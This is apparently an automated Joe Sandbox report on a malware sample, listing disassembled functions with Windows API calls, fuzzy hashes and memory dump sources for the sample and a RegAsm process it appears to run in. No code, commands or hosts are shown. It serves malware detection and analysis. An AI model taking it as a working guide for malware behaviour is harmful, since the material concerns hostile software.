Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: daf606a8d683033c96f790e5cebbb7c3d718dd05ed61dfd599687816ed725ea8
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: E4F03736700124BBCF226F95FC0899A3F26FF453B1F454565FE1995130CA319870AB98

Function 0041029D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041032D

Strings

pow, xrefs: 00410305, 00410322

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction ID: fc6d2ca4dc19ba0b715d37a90518746425c4eaa4db822c587b4b2213400e0bc5
Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction Fuzzy Hash: 6F519F71A0A60587CB157714DA413EB3B90AB00711F644D6BE8A1463E9EB7D8CF2DA8F

Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408080: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407F9B,?,?,?,?,00407F9B,0000000C,00432FA4,0000000C), ref: 004080E0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 50fcd3a1a371244ec7a0f3f24a710ecb3351835c0196af839c5ad707446f783d
Instruction ID: 4f5bf0a45fc4208832a8654eef8c337e9c06d50c54c87a988f481c954303cb93
Opcode Fuzzy Hash: 50fcd3a1a371244ec7a0f3f24a710ecb3351835c0196af839c5ad707446f783d
Instruction Fuzzy Hash: 7F4147B1504305AFC304DF29C841A9BF7E8EF89310F14862FF994A76A1E778E945CB99

Function 0040A420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A45F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A513

Strings

csm, xrefs: 0040A4FD

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 18bede24dd224cfa91d1e00103c3baabbd685d05025061fa587fd2bb58ff80c9
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 8041D934A002189BCF10DF69C885A9E7BB0FF44318F14817BE8146B3D2D779A921CB9A

Function 0040AD2D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD52

Strings

MOC, xrefs: 0040AD64
RCC, xrefs: 0040AD6C

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: 578a82eb6ed92837561ac62ae5e682fef8a2830442736a5cd94d75dd4d38702e
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 2F417D71900209AFCF16DF94CD81AEEBBB5FF48304F19406AF9047B291D3399960DB95

Function 00407413 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407D98
___raise_securityfailure.LIBCMT ref: 00407E80

Strings

@SC, xrefs: 00407E7B

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: 42319827a0e0b74c587616dcc60c70791287d7417a5014e862dc5be5bea1f8a0
Instruction ID: c5c0fd815b2f08e14ceb602fe243d88e4d65426d2e31bcd62793ea7bd9420f3f
Opcode Fuzzy Hash: 42319827a0e0b74c587616dcc60c70791287d7417a5014e862dc5be5bea1f8a0
Instruction Fuzzy Hash: 972104B4640A009BD328CF15FD857983BF4BB68359FA0643AE9088B3B0D3B46484CF1E

Function 00407E93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407E9E
___raise_securityfailure.LIBCMT ref: 00407F5B

Strings

@SC, xrefs: 00407F56

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 2125179719012bf3b699bacd38cc00c528494cfbc9043f550ba33f2ea8b81d37
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: DC11E3B4651A04DBC318CF15F8817883BB4BB28346B50B03AE8088B371E3B4A5958F5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 0040589A: _Yarn.LIBCPMT ref: 004058B9
Part of subcall function 0040589A: _Yarn.LIBCPMT ref: 004058DD

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: fbb5483a5c0b3d6c860fa312477ba2c73c4b5eacc305877fe335d4945849315c
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: D8F01261505B508ED370DF368404743BEE0AF25714F048E2ED4C9D7A91D379E508CBA9

Function 00405AAE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405AB5

Strings

1]@, xrefs: 00405ADB
pdB, xrefs: 00405AF1

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: 1]@$pdB
API String ID: 431132790-2574904542
Opcode ID: 73ce1e61eeabf46a09a1e5cf8c5bfbef05ff3b583e132448a225ea9f7212eaca
Instruction ID: 123d69972286fd69fb551aecc998dcfff066a917831aeb16d417dea724d1ca27
Opcode Fuzzy Hash: 73ce1e61eeabf46a09a1e5cf8c5bfbef05ff3b583e132448a225ea9f7212eaca
Instruction Fuzzy Hash: 1B01D6B4A00715CFC761DF28C540A5ABBF0FF08318B51896EE48ADB751D776AA40CF48

Function 004012D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004012D5

Part of subcall function 004055CE: std::invalid_argument::invalid_argument.LIBCONCRT ref: 004055DA

___std_exception_copy.LIBVCRUNTIME ref: 004012FC

Strings

string too long, xrefs: 004012D0

Memory Dump Source

Source File: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: 26fc9a0f88cba3b3d08977187bf2055019bce32afe2b0aefe6f2504baa2ffc18
Instruction ID: 272e35dc6304a19a67255a0f261e943e5561bca0c73071cc2d95ade12bed5fb2
Opcode Fuzzy Hash: 26fc9a0f88cba3b3d08977187bf2055019bce32afe2b0aefe6f2504baa2ffc18
Instruction Fuzzy Hash: DEE0C2B2A343119BD200AF94AC01986B6D99F55314712CA2FF444F3200F3B8A8808768

Analysis Process: pLAZbVgk7u.exePID: 6448, Parent PID: 6332COMMON

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	226
Total number of Limit Nodes:	15

Executed Functions

Function 00AFEB3A Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00AFEBBE
GetCurrentThread.KERNEL32 ref: 00AFEBFB
GetCurrentProcess.KERNEL32 ref: 00AFEC38
GetCurrentThreadId.KERNEL32 ref: 00AFEC91

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1e946503b954b8bd3d0ac113efa6545b387ef19eb27b3ea434b502b71849fb12
Instruction ID: 0afe6182bbd5c1f7ac6659424b1e38032ff3d4da044ac84e0f04c14d6691db85
Opcode Fuzzy Hash: 1e946503b954b8bd3d0ac113efa6545b387ef19eb27b3ea434b502b71849fb12
Instruction Fuzzy Hash: 055164B09012098FDB14DFA9D648BEEBFF1FF48314F208459E119A7360D7789988CBA5

Function 00AFEB40 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00AFEBBE
GetCurrentThread.KERNEL32 ref: 00AFEBFB
GetCurrentProcess.KERNEL32 ref: 00AFEC38
GetCurrentThreadId.KERNEL32 ref: 00AFEC91

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 273c48d729c6bf4182a5ba2e03a287aab52459cf60b33e67f5be9f48700fc7b1
Instruction ID: 2363122bacce370254ede3eba6b39a68b22c2e07c0c6c7ba2124a93a0f4d1dc3
Opcode Fuzzy Hash: 273c48d729c6bf4182a5ba2e03a287aab52459cf60b33e67f5be9f48700fc7b1
Instruction Fuzzy Hash: 985155B09012098FDB14DFA9D548BEEBFF5FF48314F208459E119A7360D7789988CBA5

Function 00AFC8A0 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00AFCB06

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: af74c8a57325c22ad24f85e64fed17869cb8ebe6ca9810997c52f8cc995b3a18
Instruction ID: 973a7277cf56be742a5640b2cbc2d10b311fba0b7d50e200c37a3c3a2ab21008
Opcode Fuzzy Hash: af74c8a57325c22ad24f85e64fed17869cb8ebe6ca9810997c52f8cc995b3a18
Instruction Fuzzy Hash: B3817C70A007098FD724DF6AD2857AABBF1FF88314F00892DE58AD7A50D775E949CB90

Function 00AF598C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00AF5A49

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cc4a91b543aafaa7c6ed9acc68c7c4e0f3a635e9a8356c507bda15784d88158a
Instruction ID: 572a0b5527f7f6d74808939be985128bec7a1d72062623f96251adfa37ca7090
Opcode Fuzzy Hash: cc4a91b543aafaa7c6ed9acc68c7c4e0f3a635e9a8356c507bda15784d88158a
Instruction Fuzzy Hash: F341F3B0C0061DCFDB28DFA9C888BDEBBB5BF49304F20816AD508AB255DB755946CF90

Function 00AF456C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00AF5A49

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 88568ac50c5434c6d8c3fcdafd315a4f7e829ca1dbaddea8eb0d95bd53ed5032
Instruction ID: 8fde41184f4eeb8dedab3893df8040150cecbf405497e3c39e23325b3aee1f23
Opcode Fuzzy Hash: 88568ac50c5434c6d8c3fcdafd315a4f7e829ca1dbaddea8eb0d95bd53ed5032
Instruction Fuzzy Hash: 6041C2B0C0071DCBDB28DFA9C888B9EBBB5BF49304F20816AD509AB255DBB55945CF90

Function 08361048 Relevance: 1.6, APIs: 1, Instructions: 79
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?), ref: 083610FD

Memory Dump Source

Source File: 0000000D.00000002.2745160113.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_pLAZbVgk7u.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a6c220624816c7ad35fb2b52a5c6c678000f7cb59d298097147ae31ef75c8858
Instruction ID: 5055e2259b834b20028a3dc289d6141c924219b011c4dc280d99e31f5c04481b
Opcode Fuzzy Hash: a6c220624816c7ad35fb2b52a5c6c678000f7cb59d298097147ae31ef75c8858
Instruction Fuzzy Hash: 3E215AB6A002489FCB14DFA9D585BDEBFF9FF48320F10845AE519A7351C735A984CBA0

Function 00AFED80 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AFEE0F

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 073a861500c62c277c9b5a0e35e2411d92b99d16607c3ca6841a6486449a6bf1
Instruction ID: 7931de485e3cc6f143230fffffd5d2e01132f277525f55fe1b2a0e2965836164
Opcode Fuzzy Hash: 073a861500c62c277c9b5a0e35e2411d92b99d16607c3ca6841a6486449a6bf1
Instruction Fuzzy Hash: C92103B5900248AFDB10DFAAD584AEEFFF5EB48310F14841AE958A3310D378A944CFA0

Function 08361B09 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 08361B8C

Memory Dump Source

Source File: 0000000D.00000002.2745160113.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_pLAZbVgk7u.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: ad57fcdf94b498ea44cda92aed4e044c1163a5c3995737d06ef5e87fca3d41e3
Instruction ID: f2766dc06c3d03b7c3fe8e1a39406ecee2f4a85717b72ef320366f5583177c94
Opcode Fuzzy Hash: ad57fcdf94b498ea44cda92aed4e044c1163a5c3995737d06ef5e87fca3d41e3
Instruction Fuzzy Hash: 332104B6D016098FDB14CF9AC984ADEFBF9FB58320F14842AD518A3240E378A544CBA4

Function 00AFED88 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AFEE0F

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 16e0be2524fe3ea1824e7724947f457b53d7e064850e6f1500ec3b614544ac25
Instruction ID: b8f2e084d0d2fff1faddf76a711ed810a8abda6c676c19c0eaf98efa79feff83
Opcode Fuzzy Hash: 16e0be2524fe3ea1824e7724947f457b53d7e064850e6f1500ec3b614544ac25
Instruction Fuzzy Hash: 9D21E6B59002489FDB10DF9AD584ADEBBF5FB48310F14801AE914A3310D378A944CFA1

Function 08361B10 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 08361B8C

Memory Dump Source

Source File: 0000000D.00000002.2745160113.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_pLAZbVgk7u.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: db1e6e7f5b8cb11dbb7a165a3c90566e58171691c98b31590cdaddf0256a6614
Instruction ID: a728781512fb92324df0596f8edc901616da2032aa7637080665fc974cb74ad3
Opcode Fuzzy Hash: db1e6e7f5b8cb11dbb7a165a3c90566e58171691c98b31590cdaddf0256a6614
Instruction Fuzzy Hash: 3F21E8B5D017499FDB14DF9AC884ADEFBF9FB48320F14802ED518A3240D378A544CBA5

Function 00AFCD20 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AFCB81,00000800,00000000,00000000), ref: 00AFCD92

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3c5b692ac72ca4a7ec8447aef99b828529ca388d4d22f59473872679846a6ab9
Instruction ID: 53414172828708e8238f693ebc09444c446c6a999927d63cb07221ce041885f9
Opcode Fuzzy Hash: 3c5b692ac72ca4a7ec8447aef99b828529ca388d4d22f59473872679846a6ab9
Instruction Fuzzy Hash: FA1126B6D002489FDB14DF9AC944ADEFBF5EF48320F10842AE919A7210C379A545CFA0

Function 00AFC578 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AFCB81,00000800,00000000,00000000), ref: 00AFCD92

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 51fe2a3932d43f25eb10d006e0ebf75420a97eab57da3c4e3ddbab5f8b1f2e4e
Instruction ID: 5c3634fd7d2d643bb29976410d5a5ad03edeada46644fa7d25be8a41037248c1
Opcode Fuzzy Hash: 51fe2a3932d43f25eb10d006e0ebf75420a97eab57da3c4e3ddbab5f8b1f2e4e
Instruction Fuzzy Hash: B31117B690024C9FDB10DF9AD544AEEFBF5EF48320F10842AE919A7210D379A944CFA4

Function 04B3E072 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 04B3E0E2

Memory Dump Source

Source File: 0000000D.00000002.2744294554.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4b30000_pLAZbVgk7u.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: e8ed44d20ec1a77cb5c9d6fb1d8757ab2105a2cc79eb6d12dcb9edc1117ee57d
Instruction ID: ac57a66a0d1ed8b83071c28976475c99240509559498ee7ae99f1933909e12de
Opcode Fuzzy Hash: e8ed44d20ec1a77cb5c9d6fb1d8757ab2105a2cc79eb6d12dcb9edc1117ee57d
Instruction Fuzzy Hash: 0E1112B68006498FDB14DFAAC445BDEFBF5EB88320F10846AD868A7640D339A545CFA1

Function 04B3E078 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 04B3E0E2

Memory Dump Source

Source File: 0000000D.00000002.2744294554.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4b30000_pLAZbVgk7u.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: a1360fcc4706899977b3b472c8da15921cb9d57123d0de2bd1090f5cea0dbb1b
Instruction ID: 7c47239fcd784e2de58c50758af9ff13e096c7c8b53491f2b9a0b52da8c444d9
Opcode Fuzzy Hash: a1360fcc4706899977b3b472c8da15921cb9d57123d0de2bd1090f5cea0dbb1b
Instruction Fuzzy Hash: CE1123B28006498FDB14DFAAC444BDEFBF5EF88320F10C46AD868A7640D339A545CFA1

Function 04B3C2D4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 04B3FB55

Memory Dump Source

Source File: 0000000D.00000002.2744294554.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4b30000_pLAZbVgk7u.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c9ddf27b9dce37a86d7d40317f32d13e415d0a91a21434f50b7511cc326f168e
Instruction ID: c3591bb61491960a4d018bb1a1adec3158dc67f0d580582ad97cd5c8d6e8f2bd
Opcode Fuzzy Hash: c9ddf27b9dce37a86d7d40317f32d13e415d0a91a21434f50b7511cc326f168e
Instruction Fuzzy Hash: 2F11F5B59003499FDB10DF9AC444BEEBBF8EB48310F108459E918A7200D379A944CFA5

Function 0836DD23 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 0836DD87

Memory Dump Source

Source File: 0000000D.00000002.2745160113.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_pLAZbVgk7u.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: f37d3e80f7347df1073cfd938475ca45c1c12796fa646ac3a0e77c22f31cfd76
Instruction ID: 94affaf62d84fb72e2eda0be5d4326f255ece8229cbdb7ce8b0f300d6f7f63ed
Opcode Fuzzy Hash: f37d3e80f7347df1073cfd938475ca45c1c12796fa646ac3a0e77c22f31cfd76
Instruction Fuzzy Hash: 381136B5D002498ECB14EFA9C4457EEBBF5EF88324F24841AC459A7240C779A545CBA0

Function 0836DD28 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 0836DD87

Memory Dump Source

Source File: 0000000D.00000002.2745160113.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_pLAZbVgk7u.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 28472b9dcdd454dbb189c8009bb62dfed293c9b3ff6dac1b66ab213b760cc6f2
Instruction ID: 6d1cabc91e241ea0d569db112786d841ce5c8fd7ef43cb7a136c5cf5f36a8f92
Opcode Fuzzy Hash: 28472b9dcdd454dbb189c8009bb62dfed293c9b3ff6dac1b66ab213b760cc6f2
Instruction Fuzzy Hash: E21103B5D003498FCB24EFAAC4457EEFBF5EF88324F20841AC519A7250CB79A544CBA1

Function 00AFCAA0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00AFCB06

Memory Dump Source

Source File: 0000000D.00000002.2740973129.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_af0000_pLAZbVgk7u.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 550cdaf61ef216449bbc223b2841c4f4bfec168b3d0b9f2c022a80b22dd47292
Instruction ID: a6da403b9392df2e0a73ea1d252afee12e0b87d81e42bca3afc59a88e69e100a
Opcode Fuzzy Hash: 550cdaf61ef216449bbc223b2841c4f4bfec168b3d0b9f2c022a80b22dd47292
Instruction Fuzzy Hash: C211E0B5D002498FCB14DF9AC544ADEFBF9EF89320F10845AD929B7210C379A545CFA1

Function 04B3FAF1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 04B3FB55

Memory Dump Source

Source File: 0000000D.00000002.2744294554.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4b30000_pLAZbVgk7u.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 922c3b9fe865f3b531d2ff867609fe4e3bc20efd94c5e3414b52e86c5d807cf8
Instruction ID: 3edd3b574dfc164a2cd33bc0a5f0148ccc2dbc7657cd68840bc38c0fc587864b
Opcode Fuzzy Hash: 922c3b9fe865f3b531d2ff867609fe4e3bc20efd94c5e3414b52e86c5d807cf8
Instruction Fuzzy Hash: FE1103B9800349DFDB10DF9AC585BEEBBF8EB48310F24844AD558A7600D379A584CFA1

Function 00A1D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2740455972.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_a1d000_pLAZbVgk7u.jbxd

Similarity

API ID:
String ID:
API String ID:
